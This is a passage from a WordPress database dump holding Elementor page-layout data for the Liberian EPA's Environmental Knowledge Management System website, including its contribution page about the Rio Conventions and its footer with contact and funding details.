Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>if you are interested in contributing to the EKMS!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(30281,4229,'_elementor_edit_mode','builder'),(30282,4229,'_elementor_template_type','wp-page'),(30283,4229,'_elementor_version','2.8.1'),(30284,4229,'_wp_page_template','default'),(30285,4229,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>if you are interested in contributing to the EKMS!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(30286,4230,'_elementor_edit_mode','builder'),(30287,4230,'_elementor_template_type','wp-page'),(30288,4230,'_elementor_version','2.8.1'),(30289,4230,'_wp_page_template','default'),(30290,4230,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\"}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\"}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\"}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>if you are interested in contributing to the EKMS!<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(30292,74,'_elementor_pro_version','3.3.6'),(30293,74,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}}'),(30296,4231,'_elementor_edit_mode','builder'),(30297,4231,'_elementor_template_type','footer'),(30298,4231,'_elementor_version','3.4.0'),(30299,4231,'_elementor_pro_version','3.3.6'),(30300,4231,'_wp_page_template','default'),(30301,4231,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contribute\\/\\\">Join here!<\\/a><\\/span>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416000000000000369482222595252096652984619140625},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.1120000000000000994759830064140260219573974609375},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.13199999999999789679350215010344982147216796875,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.339999999999999857891452847979962825775146484375},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30303,4231,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(30308,4232,'_elementor_edit_mode','builder'),(30309,4232,'_elementor_template_type','footer'),(30310,4232,'_elementor_version','3.4.1'),(30311,4232,'_elementor_pro_version','3.3.6'),(30312,4232,'_wp_page_template','default'),(30313,4232,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Are you interested in 